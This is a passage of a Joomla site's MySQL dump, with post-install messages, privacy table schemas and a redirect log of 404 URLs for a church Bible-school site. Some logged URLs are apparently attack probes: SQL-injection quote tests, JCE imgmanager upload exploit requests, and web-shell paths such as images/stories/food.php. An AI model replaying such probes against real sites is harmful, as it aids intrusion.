(4, 700, 'PLG_SYSTEM_UPDATENOTIFICATION_POSTINSTALL_UPDATECACHETIME', 'PLG_SYSTEM_UPDATENOTIFICATION_POSTINSTALL_UPDATECACHETIME_BODY', 'PLG_SYSTEM_UPDATENOTIFICATION_POSTINSTALL_UPDATECACHETIME_ACTION', 'plg_system_updatenotification', 1, 'action', 'site://plugins/system/updatenotification/postinstall/updatecachetime.php', 'updatecachetime_postinstall_action', 'site://plugins/system/updatenotification/postinstall/updatecachetime.php', 'updatecachetime_postinstall_condition', '3.6.3', 1),
(5, 700, 'COM_CPANEL_MSG_JOOMLA40_PRE_CHECKS_TITLE', 'COM_CPANEL_MSG_JOOMLA40_PRE_CHECKS_BODY', '', 'com_cpanel', 1, 'message', '', '', 'admin://components/com_admin/postinstall/joomla40checks.php', 'admin_postinstall_joomla40checks_condition', '3.7.0', 1),
(6, 700, 'TPL_HATHOR_MESSAGE_POSTINSTALL_TITLE', 'TPL_HATHOR_MESSAGE_POSTINSTALL_BODY', 'TPL_HATHOR_MESSAGE_POSTINSTALL_ACTION', 'tpl_hathor', 1, 'action', 'admin://templates/hathor/postinstall/hathormessage.php', 'hathormessage_postinstall_action', 'admin://templates/hathor/postinstall/hathormessage.php', 'hathormessage_postinstall_condition', '3.7.0', 1),
(7, 700, 'PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_TITLE', 'PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_BODY', 'PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_ACTION', 'plg_captcha_recaptcha', 1, 'action', 'site://plugins/captcha/recaptcha/postinstall/actions.php', 'recaptcha_postinstall_action', 'site://plugins/captcha/recaptcha/postinstall/actions.php', 'recaptcha_postinstall_condition', '3.8.6', 1),
(8, 700, 'COM_CPANEL_MSG_UPDATEDEFAULTSETTINGS_TITLE', 'COM_CPANEL_MSG_UPDATEDEFAULTSETTINGS_BODY', '', 'com_cpanel', 1, 'message', '', '', 'admin://components/com_admin/postinstall/updatedefaultsettings.php', 'admin_postinstall_updatedefaultsettings_condition', '3.8.8', 1),
(9, 700, 'COM_ACTIONLOGS_POSTINSTALL_TITLE', 'COM_ACTIONLOGS_POSTINSTALL_BODY', '', 'com_actionlogs', 1, 'message', '', '', '', '', '3.9.0', 1),
(10, 700, 'COM_PRIVACY_POSTINSTALL_TITLE', 'COM_PRIVACY_POSTINSTALL_BODY', '', 'com_privacy', 1, 'message', '', '', '', '', '3.9.0', 1),
(11, 700, 'COM_CPANEL_MSG_ADDNOSNIFF_TITLE', 'COM_CPANEL_MSG_ADDNOSNIFF_BODY', '', 'com_cpanel', 1, 'message', '', '', 'admin://components/com_admin/postinstall/addnosniff.php', 'admin_postinstall_addnosniff_condition', '3.9.3', 1);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_privacy_consents`
--

CREATE TABLE `y57u5_privacy_consents` (
  `id` int(10) UNSIGNED NOT NULL,
  `user_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `state` int(10) NOT NULL DEFAULT '1',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `subject` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `body` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `remind` tinyint(4) NOT NULL DEFAULT '0',
  `token` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_privacy_requests`
--

CREATE TABLE `y57u5_privacy_requests` (
  `id` int(10) UNSIGNED NOT NULL,
  `email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `requested_at` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `status` tinyint(4) NOT NULL DEFAULT '0',
  `request_type` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `confirm_token` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `confirm_token_created_at` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_redirect_links`
--

CREATE TABLE `y57u5_redirect_links` (
  `id` int(10) UNSIGNED NOT NULL,
  `old_url` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `new_url` varchar(2048) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `referer` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `hits` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `published` tinyint(4) NOT NULL,
  `created_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `header` smallint(3) NOT NULL DEFAULT '301'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_redirect_links`
--

INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(1, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?Itemid=108', NULL, '', '', 3, 0, '2016-10-24 19:33:56', '0000-00-00 00:00:00', 301),
(2, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?Itemid=435', NULL, '', '', 2, 0, '2016-11-04 02:42:29', '0000-00-00 00:00:00', 301),
(3, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?Itemid=106', NULL, '', '', 2, 0, '2016-11-04 02:42:33', '0000-00-00 00:00:00', 301),
(4, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', '', 7, 0, '2016-11-04 09:18:07', '0000-00-00 00:00:00', 301),
(5, 'http://ljmti.lifeoasisinternationalchurch.org/?option=com_user&view=register', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/?option=com_user&view=register', '', 1, 0, '2016-11-04 09:39:32', '0000-00-00 00:00:00', 301),
(6, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=103&Itemid=992', NULL, '', '', 2, 0, '2016-11-05 20:54:52', '0000-00-00 00:00:00', 301),
(7, 'http://ljmti.lifeoasisinternationalchurch.org/?Itemid=106', NULL, '', '', 16, 0, '2016-11-10 16:27:15', '0000-00-00 00:00:00', 301),
(8, 'http://ljmti.lifeoasisinternationalchurch.org/?Itemid=435', NULL, '', '', 16, 0, '2016-11-10 16:27:16', '0000-00-00 00:00:00', 301),
(9, 'http://ljmti.lifeoasisinternationalchurch.org/?Itemid=108', NULL, '', '', 11, 0, '2016-11-10 16:27:17', '0000-00-00 00:00:00', 301),
(10, 'http://ljmti.lifeoasisinternationalchurch.org/wp-login.php', NULL, '', '', 11, 0, '2016-11-10 22:52:57', '0000-00-00 00:00:00', 301),
(11, 'http://ljmti.lifeoasisinternationalchurch.org/media/module-layouts', NULL, '', '', 14, 0, '2016-11-13 22:48:48', '0000-00-00 00:00:00', 301),
(12, 'http://ljmti.lifeoasisinternationalchurch.org/media/icon-fonts', NULL, '', '', 2, 0, '2016-11-15 03:59:49', '0000-00-00 00:00:00', 301),
(13, 'http://ljmti.lifeoasisinternationalchurch.org/media/live-streaming', NULL, '', '', 6, 0, '2016-11-15 10:38:28', '0000-00-00 00:00:00', 301),
(14, 'http://ljmti.lifeoasisinternationalchurch.org/media/rtl-language-ready', NULL, '', '', 2, 0, '2016-11-15 15:39:43', '0000-00-00 00:00:00', 301),
(15, 'http://ljmti.lifeoasisinternationalchurch.org/media/column-blocks', NULL, '', '', 2, 0, '2016-11-15 19:12:31', '0000-00-00 00:00:00', 301),
(16, 'http://ljmti.lifeoasisinternationalchurch.org/media/widgetkit/', NULL, '', '', 3, 0, '2016-11-15 20:52:59', '0000-00-00 00:00:00', 301),
(17, 'http://ljmti.lifeoasisinternationalchurch.org/favicon.ico', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/index.php', '', 8, 0, '2016-11-16 09:02:08', '0000-00-00 00:00:00', 301),
(18, 'http://ljmti.lifeoasisinternationalchurch.org/media/pricing-tables', NULL, '', '', 2, 0, '2016-11-16 12:20:34', '0000-00-00 00:00:00', 301),
(19, 'http://ljmti.lifeoasisinternationalchurch.org/media/color-styles', NULL, '', '', 1, 0, '2016-11-16 17:26:13', '0000-00-00 00:00:00', 301),
(20, 'http://ljmti.lifeoasisinternationalchurch.org/media/admin-panel', NULL, '', '', 2, 0, '2016-11-17 15:03:55', '0000-00-00 00:00:00', 301),
(21, 'http://ljmti.lifeoasisinternationalchurch.org/digital/', NULL, '', '', 2, 0, '2016-11-25 05:43:21', '0000-00-00 00:00:00', 301),
(22, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_content\'A=0&view=article&id=29&Itemid=196', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_content\'A=0&view=article&id=29&Itemid=196', '', 1, 0, '2016-11-27 19:20:59', '0000-00-00 00:00:00', 301),
(23, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'A=0&id=29&Itemid=196', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'A=0&id=29&Itemid=196', '', 1, 0, '2016-11-27 19:21:01', '0000-00-00 00:00:00', 301),
(24, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_easyblog&view=dashboard&layout=write', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 3, 0, '2016-11-29 02:57:31', '0000-00-00 00:00:00', 301),
(25, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20', NULL, '', '', 49, 0, '2016-11-29 23:11:35', '0000-00-00 00:00:00', 301),
(26, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b', NULL, '', '', 57, 0, '2016-11-29 23:11:38', '0000-00-00 00:00:00', 301),
(27, 'http://ljmti.lifeoasisinternationalchurch.org/images/stories/food.php?rf', NULL, '', '', 16, 0, '2016-11-29 23:11:47', '0000-00-00 00:00:00', 301),
(28, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_content\'A=0&view=article&id=61&Itemid=303', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_content\'A=0&view=article&id=61&Itemid=303', '', 1, 0, '2016-11-30 09:15:32', '0000-00-00 00:00:00', 301),
(29, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'A=0&id=61&Itemid=303', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'A=0&id=61&Itemid=303', '', 1, 0, '2016-11-30 09:15:34', '0000-00-00 00:00:00', 301),
(30, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-media/itemlist/tag/', NULL, '', '', 2, 0, '2016-12-01 10:26:51', '0000-00-00 00:00:00', 301),
(31, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest-items-by-users/itemlist/tag/', NULL, '', '', 1, 0, '2016-12-03 16:05:49', '0000-00-00 00:00:00', 301),
(32, 'http://ljmti.lifeoasisinternationalchurch.org/about-us/', NULL, '', '', 3, 0, '2016-12-04 02:08:41', '0000-00-00 00:00:00', 301),
(33, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/', NULL, '', '', 3, 0, '2016-12-04 16:22:09', '0000-00-00 00:00:00', 301),
(34, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/user-page-blog/itemlist/tag/', NULL, '', '', 2, 0, '2016-12-05 10:35:25', '0000-00-00 00:00:00', 301),
(35, 'http://ljmti.lifeoasisinternationalchurch.org/component/tags/tag/', NULL, '', '', 2, 0, '2016-12-05 14:30:46', '0000-00-00 00:00:00', 301),
(36, 'http://ljmti.lifeoasisinternationalchurch.org/images/stories/petx.php?baca', NULL, '', '', 1, 0, '2016-12-08 14:04:10', '0000-00-00 00:00:00', 301),
(37, 'http://ljmti.lifeoasisinternationalchurch.org/images/stories/explore.php?baca', NULL, '', '', 1, 0, '2016-12-08 14:04:10', '0000-00-00 00:00:00', 301),
(38, 'http://ljmti.lifeoasisinternationalchurch.org//images/stories/hybrid.php.png', NULL, '', '', 1, 0, '2016-12-08 14:04:11', '0000-00-00 00:00:00', 301),
(39, 'http://ljmti.lifeoasisinternationalchurch.org/joomla/index.php', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/index.php', '', 3, 0, '2016-12-08 15:00:35', '0000-00-00 00:00:00', 301),
(40, 'http://ljmti.lifeoasisinternationalchurch.org/admin.php', NULL, '', '', 1, 0, '2016-12-09 01:55:46', '0000-00-00 00:00:00', 301),
(41, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/item/', NULL, '', '', 1, 0, '2016-12-09 11:38:12', '0000-00-00 00:00:00', 301),
(42, 'http://ljmti.lifeoasisinternationalchurch.org/home/62-welcome-ljmti-home', NULL, '', '', 3, 0, '2016-12-12 04:09:20', '0000-00-00 00:00:00', 301),
(43, 'http://ljmti.lifeoasisinternationalchurch.org/home/63-recent-news-update', NULL, '', '', 2, 0, '2016-12-13 17:56:24', '0000-00-00 00:00:00', 301),
(44, 'http://ljmti.lifeoasisinternationalchurch.org/tqxfpzcxlwbd.html', NULL, '', '', 1, 0, '2016-12-14 10:50:27', '0000-00-00 00:00:00', 301),
(45, 'http://ljmti.lifeoasisinternationalchurch.org/.git/', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/.git/', '', 1, 0, '2016-12-15 00:03:02', '0000-00-00 00:00:00', 301),
(46, 'http://ljmti.lifeoasisinternationalchurch.org/digital/icon-fonts\'', NULL, '', '', 1, 0, '2016-12-15 05:54:15', '0000-00-00 00:00:00', 301),
(47, 'http://ljmti.lifeoasisinternationalchurch.org/special-ministry-outreach', NULL, '', '', 2, 0, '2016-12-16 10:55:40', '0000-00-00 00:00:00', 301),
(48, 'http://ljmti.lifeoasisinternationalchurch.org/home/practical-section', NULL, '', '', 3, 0, '2016-12-17 00:50:30', '0000-00-00 00:00:00', 301),
(49, 'http://ljmti.lifeoasisinternationalchurch.org/images/stories/food.php', NULL, '', '', 9, 0, '2016-12-17 08:55:42', '0000-00-00 00:00:00', 301),
(50, 'http://ljmti.lifeoasisinternationalchurch.org/images/stories/petx.gif', NULL, '', '', 1, 0, '2016-12-17 08:55:51', '0000-00-00 00:00:00', 301),
(51, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-notes/item/', NULL, '', '', 1, 0, '2016-12-18 01:06:21', '0000-00-00 00:00:00', 301),
(52, 'http://ljmti.lifeoasisinternationalchurch.org/component/user/register', NULL, '', '', 2, 0, '2016-12-19 01:30:24', '0000-00-00 00:00:00', 301),
(53, 'http://ljmti.lifeoasisinternationalchurch.org/index.php/component/user/register', NULL, '', '', 2, 0, '2016-12-19 01:30:25', '0000-00-00 00:00:00', 301),
(54, 'http://ljmti.lifeoasisinternationalchurch.org/a', NULL, '', '', 2, 0, '2016-12-19 11:18:03', '0000-00-00 00:00:00', 301),
(55, 'http://ljmti.lifeoasisinternationalchurch.org/digital/column-blocks', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 5, 0, '2016-12-19 16:04:29', '0000-00-00 00:00:00', 301),
(56, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/index.php', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/', '', 1, 0, '2016-12-20 08:02:40', '0000-00-00 00:00:00', 301),
(57, 'http://ljmti.lifeoasisinternationalchurch.org/home/full-time-bible-school', NULL, '', '', 4, 0, '2016-12-21 23:49:50', '0000-00-00 00:00:00', 301),
(58, 'http://ljmti.lifeoasisinternationalchurch.org/digital/admin-panel', NULL, '', '', 2, 0, '2016-12-22 01:10:41', '0000-00-00 00:00:00', 301),
(59, 'http://ljmti.lifeoasisinternationalchurch.org/?Itemid=771', NULL, '', '', 2, 0, '2016-12-22 14:30:33', '0000-00-00 00:00:00', 301),
(60, 'http://ljmti.lifeoasisinternationalchurch.org/?Itemid=103', NULL, '', '', 2, 0, '2016-12-22 14:30:39', '0000-00-00 00:00:00', 301),
(61, 'http://ljmti.lifeoasisinternationalchurch.org/?Itemid=773', NULL, '', '', 2, 0, '2016-12-22 14:30:44', '0000-00-00 00:00:00', 301),
(62, 'http://ljmti.lifeoasisinternationalchurch.org/home/advanced-bible-school', NULL, '', '', 5, 0, '2016-12-23 08:34:44', '0000-00-00 00:00:00', 301),
(63, 'http://ljmti.lifeoasisinternationalchurch.org/home/special-ministry-outreach', NULL, '', '', 4, 0, '2016-12-24 22:02:19', '0000-00-00 00:00:00', 301),
(64, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/itemlist/tag/', NULL, '', '', 2, 0, '2016-12-25 01:12:04', '0000-00-00 00:00:00', 301),
(65, 'http://ljmti.lifeoasisinternationalchurch.org/digital/module-layouts', NULL, '', '', 8, 0, '2016-12-25 02:52:32', '0000-00-00 00:00:00', 301),
(66, 'http://ljmti.lifeoasisinternationalchurch.org/digital/widgetkit', NULL, '', '', 1, 0, '2016-12-25 15:49:17', '0000-00-00 00:00:00', 301),
(67, 'http://ljmti.lifeoasisinternationalchurch.org/digital/color-styles', NULL, '', '', 1, 0, '2016-12-26 19:15:44', '0000-00-00 00:00:00', 301),
(68, 'http://ljmti.lifeoasisinternationalchurch.org/home/49-interdenominational', NULL, '', '', 2, 0, '2016-12-27 04:33:14', '0000-00-00 00:00:00', 301),
(69, 'http://ljmti.lifeoasisinternationalchurch.org/home/weekend-bible-school', NULL, '', '', 4, 0, '2016-12-27 08:56:43', '0000-00-00 00:00:00', 301),
(70, 'http://ljmti.lifeoasisinternationalchurch.org/tuition-fee', NULL, '', '', 5, 0, '2016-12-27 22:40:27', '0000-00-00 00:00:00', 301),
(71, 'http://ljmti.lifeoasisinternationalchurch.org/home/weekend-bible-school/63-recent-news-update', NULL, '', '', 4, 0, '2016-12-30 10:30:09', '0000-00-00 00:00:00', 301),
(72, 'http://ljmti.lifeoasisinternationalchurch.org/home/special-ministry-outreach/63-recent-news-update/', NULL, '', '', 1, 0, '2016-12-30 19:45:43', '0000-00-00 00:00:00', 301),
(73, 'http://ljmti.lifeoasisinternationalchurch.org/ministries/', NULL, '', '', 1, 0, '2016-12-30 20:34:17', '0000-00-00 00:00:00', 301),
(74, 'http://ljmti.lifeoasisinternationalchurch.org/registration', NULL, '', '', 5, 0, '2016-12-31 06:50:48', '0000-00-00 00:00:00', 301),
(75, 'http://ljmti.lifeoasisinternationalchurch.org/digital/pricing-tables', NULL, '', '', 1, 0, '2016-12-31 14:36:36', '0000-00-00 00:00:00', 301),
(76, 'http://ljmti.lifeoasisinternationalchurch.org/portfolio/audio-portfolio', NULL, '', '', 1, 0, '2016-12-31 17:59:45', '0000-00-00 00:00:00', 301),
(77, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-joomla', NULL, '', '', 1, 0, '2016-12-31 18:10:37', '0000-00-00 00:00:00', 301),
(78, 'http://ljmti.lifeoasisinternationalchurch.org/templates/lighthouse_j3/warp/fonts/fontawesome-webfont.woff2) format(\"woff2\"), url(../fonts/fontawesome-webfont.woff) format(\"woff\"), url(../fonts/fontawesome-webfont.ttf) format(\"truetype\"', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/about-us/ordained', '', 1, 0, '2016-12-31 18:23:00', '0000-00-00 00:00:00', 301),
(79, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/itemlist/tag/music', NULL, '', '', 1, 0, '2016-12-31 19:21:20', '0000-00-00 00:00:00', 301),
(80, 'http://ljmti.lifeoasisinternationalchurch.org/joomla?format=feed&type=rss', NULL, '', '', 1, 0, '2016-12-31 20:28:22', '0000-00-00 00:00:00', 301),
(81, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-item', NULL, '', '', 1, 0, '2016-12-31 21:01:53', '0000-00-00 00:00:00', 301),
(82, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/images/demo/crimson/background/slide8.jpg', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/index.php?option=com_widgetkit&task=edit_slideshow&id=9', '', 8, 0, '2016-12-31 23:29:02', '0000-00-00 00:00:00', 301),
(83, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/images/demo/crimson/background/slide5.png', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/index.php?option=com_widgetkit&task=edit_slideshow&id=9', '', 6, 0, '2016-12-31 23:29:02', '0000-00-00 00:00:00', 301),
(84, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/images/demo/crimson/background/slide4.jpg', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/index.php?option=com_widgetkit&task=edit_slideshow&id=9', '', 8, 0, '2016-12-31 23:29:02', '0000-00-00 00:00:00', 301),
(85, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/images/demo/slide/images/_blank.jpg', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/index.php?option=com_widgetkit&task=edit_slideshow&id=20', '', 1, 0, '2016-12-31 23:29:27', '0000-00-00 00:00:00', 301),
(86, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/images/demo/gallery/column_1/2.jpg', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/index.php?option=com_widgetkit&task=edit_slideshow&id=2', '', 1, 0, '2016-12-31 23:31:23', '0000-00-00 00:00:00', 301),
(87, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/images/demo/gallery/column_1/3.jpg', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/index.php?option=com_widgetkit&task=edit_slideshow&id=2', '', 1, 0, '2016-12-31 23:31:23', '0000-00-00 00:00:00', 301),
(88, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/images/2017mercy.png', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/index.php?option=com_widgetkit&task=edit_slideshow&id=9', '', 3, 0, '2016-12-31 23:38:33', '0000-00-00 00:00:00', 301),
(89, 'http://ljmti.lifeoasisinternationalchurch.org/modules/mod_vina_youtube_channel/assets/css/grey_blue_contour.png', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/modules/mod_vina_youtube_channel/assets/css/style_blue.css', '', 2, 0, '2016-12-31 23:46:52', '0000-00-00 00:00:00', 301),
(90, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/20/-', NULL, '', '', 1, 0, '2017-01-01 01:03:26', '0000-00-00 00:00:00', 301),
(91, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/31/-', NULL, '', '', 1, 0, '2017-01-01 01:03:28', '0000-00-00 00:00:00', 301),
(92, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1952/9/-', NULL, '', '', 1, 0, '2017-01-01 01:03:32', '0000-00-00 00:00:00', 301),
(93, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/11/-', NULL, '', '', 1, 0, '2017-01-01 01:03:40', '0000-00-00 00:00:00', 301),
(94, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1952/1/-', NULL, '', '', 1, 0, '2017-01-01 01:04:21', '0000-00-00 00:00:00', 301),
(95, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1958/2/-', NULL, '', '', 1, 0, '2017-01-01 01:04:30', '0000-00-00 00:00:00', 301),
(96, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1953/10/-', NULL, '', '', 1, 0, '2017-01-01 01:04:38', '0000-00-00 00:00:00', 301),
(97, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/21/-', NULL, '', '', 1, 0, '2017-01-01 01:04:46', '0000-00-00 00:00:00', 301),
(98, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1954/11/-', NULL, '', '', 1, 0, '2017-01-01 01:05:09', '0000-00-00 00:00:00', 301),
(99, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1950/8/-', NULL, '', '', 1, 0, '2017-01-01 01:05:19', '0000-00-00 00:00:00', 301),
(100, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/28/-', NULL, '', '', 1, 0, '2017-01-01 01:05:27', '0000-00-00 00:00:00', 301),
(101, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/8/-', NULL, '', '', 1, 0, '2017-01-01 01:05:35', '0000-00-00 00:00:00', 301),
(102, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1956/1/-', NULL, '', '', 1, 0, '2017-01-01 01:06:08', '0000-00-00 00:00:00', 301),
(103, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1949/3/-', NULL, '', '', 1, 0, '2017-01-01 01:06:42', '0000-00-00 00:00:00', 301),
(104, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/18/-', NULL, '', '', 1, 0, '2017-01-01 01:06:58', '0000-00-00 00:00:00', 301),
(105, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1957/2/-', NULL, '', '', 1, 0, '2017-01-01 01:07:07', '0000-00-00 00:00:00', 301),
(106, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/4/-', NULL, '', '', 1, 0, '2017-01-01 01:07:15', '0000-00-00 00:00:00', 301),
(107, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/29/-', NULL, '', '', 1, 0, '2017-01-01 01:07:22', '0000-00-00 00:00:00', 301),
(108, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/k2-tag', NULL, '', '', 2, 0, '2017-01-01 03:37:53', '0000-00-00 00:00:00', 301),
(109, 'http://ljmti.lifeoasisinternationalchurch.org/joomla?format=feed&type=atom', NULL, '', '', 1, 0, '2017-01-01 04:11:01', '0000-00-00 00:00:00', 301),
(110, 'http://ljmti.lifeoasisinternationalchurch.org/images/body/note.png', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-01-01 07:18:05', '0000-00-00 00:00:00', 301),
(111, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-wordpress/itemlist/tag/Joomla', NULL, '', '', 2, 0, '2017-01-01 07:37:05', '0000-00-00 00:00:00', 301),
(112, 'http://ljmti.lifeoasisinternationalchurch.org/home/full-time-bible-school/63-recent-news-update', NULL, '', '', 2, 0, '2017-01-01 07:52:07', '0000-00-00 00:00:00', 301),
(113, 'http://ljmti.lifeoasisinternationalchurch.org/administrator/i', NULL, '', '', 1, 0, '2017-01-01 08:15:11', '0000-00-00 00:00:00', 301),
(114, 'http://ljmti.lifeoasisinternationalchurch.org/portfolio/gallery-in-blocks', NULL, '', '', 3, 0, '2017-01-01 08:43:58', '0000-00-00 00:00:00', 301),
(115, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/30/-', NULL, '', '', 1, 0, '2017-01-01 10:27:19', '0000-00-00 00:00:00', 301),
(116, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1951/5/-', NULL, '', '', 1, 0, '2017-01-01 10:27:43', '0000-00-00 00:00:00', 301),
(117, 'http://ljmti.lifeoasisinternationalchurch.org/?Itemid=437', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-01-01 12:36:12', '0000-00-00 00:00:00', 301),
(118, 'http://ljmti.lifeoasisinternationalchurch.org/ministries/youth-teenagers', NULL, '', '', 1, 0, '2017-01-01 12:42:01', '0000-00-00 00:00:00', 301),
(119, 'http://ljmti.lifeoasisinternationalchurch.org/images/demo/video/live_stream_2.png', NULL, '', '', 1, 0, '2017-01-01 13:15:41', '0000-00-00 00:00:00', 301),
(120, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-news', NULL, '', '', 2, 0, '2017-01-01 15:29:27', '0000-00-00 00:00:00', 301),
(121, 'http://ljmti.lifeoasisinternationalchurch.org/facebook.com/dclivestreaming', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-01-01 17:17:17', '0000-00-00 00:00:00', 301),
(122, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/5/16/-', NULL, '', '', 1, 0, '2017-01-01 17:54:48', '0000-00-00 00:00:00', 301),
(123, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/5/18/-', NULL, '', '', 1, 0, '2017-01-01 17:55:16', '0000-00-00 00:00:00', 301),
(124, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/12/18/-', NULL, '', '', 1, 0, '2017-01-01 17:55:25', '0000-00-00 00:00:00', 301),
(125, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/5/12/-', NULL, '', '', 1, 0, '2017-01-01 17:55:34', '0000-00-00 00:00:00', 301),
